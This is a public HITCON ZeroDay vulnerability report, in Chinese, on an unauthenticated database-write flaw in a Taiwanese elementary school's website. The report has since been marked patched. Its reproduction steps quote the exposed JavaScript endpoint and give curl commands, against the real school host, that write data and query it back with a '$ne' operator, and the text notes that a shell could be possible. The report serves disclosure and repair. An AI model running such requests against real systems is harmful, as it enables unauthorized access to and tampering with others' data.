Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00965
- 發信 Vendor: 屏東縣崁頂鄉港東國民小學
- Title: 港東國小 系統未授權資料庫寫入漏洞
- Introduction: 系統端點允許未經授權寫入資料至資料庫
處理狀態
目前狀態
公開
Last Update : 2025/10/03
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/08/13 17:26:14 : 新提交 (由 肉 更新此狀態)
- 2025/08/13 17:27:23 : 新提交 (由 肉 更新此狀態)
- 2025/08/13 17:29:02 : 新提交 (由 肉 更新此狀態)
- 2025/08/14 21:31:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/26 15:54:46 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/26 15:54:46 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/26 15:54:46 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/09/25 16:22:49 : 已修補 (由 組織帳號 更新此狀態)
- 2025/10/03 03:00:22 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00965
- 通報者:kevin2758 (肉)
- 風險:嚴重
- 類型:存取控制缺陷 (Broken Access Control)
參考資料
攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料,或連線至高權限使用者的頁面。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.kdps.ptc.edu.tw/nss/core?v=4
https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/packMulti
https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/find
https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/packMulti
https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/find
敘述
系統的 packMulti 端點缺乏存取控制,允許未經授權的使用者直接寫入資料至資料庫
重現步驟
-
在網站的原始碼中查詢到危險端點https://www.kdps.ptc.edu.tw/nss/core?v=4,曝露危險函數packMulti
packMulti: function (m, s) { return [ "/nss/site", currentSite.upath, "storage", m, s, "packMulti", ].join("/"); } api$setMultiIntoStorage: function (data, option, v, s) { var uri = apiRouter.packMulti(this.mid, this.sid); var p = axios.post(uri, { data: data, option: option, vector: v ? v : "private", static: Boolean(s), }); return jsonErrorHandler(p); } -
執行未授權寫入:
curl -X POST https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/packMulti \ -H "Content-Type: application/json" \ -d '{"data": [{"test": true}], "option": {' -
確認寫入成功:
curl -X POST https://www.kdps.ptc.edu.tw/nss/site/main/storage/5abf2d7aaa93092cee58ceb8/GiI36Qn0578/find -H "Content-Type: appl ication/json" -d '{"$ne": null}'返回新資料 ID: 689c5541592b410422af05f2,透過時間驗證資料存在
影響
- 無需身份驗證即可寫入資料庫
- 可插入任意資料破壞資料完整性
- 可能建立shell,因其他檔案搭配/uploads路徑,有伺服器被接管的疑慮,能被寫入已經嚴重,就不進一步測試
測試資料,若造成困擾非常抱歉
已插入測試資料需清理:
ID: 689c5541592b410422af05f2
內容: {"test": true}
時間: 2025-08-13
修補建議
1. 實施適當的存取控制機制
2. 所有寫入操作需要身份驗證
3. 實施後端權限驗證(目前只在前端)
4. 審計現有資料是否有未授權寫入
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。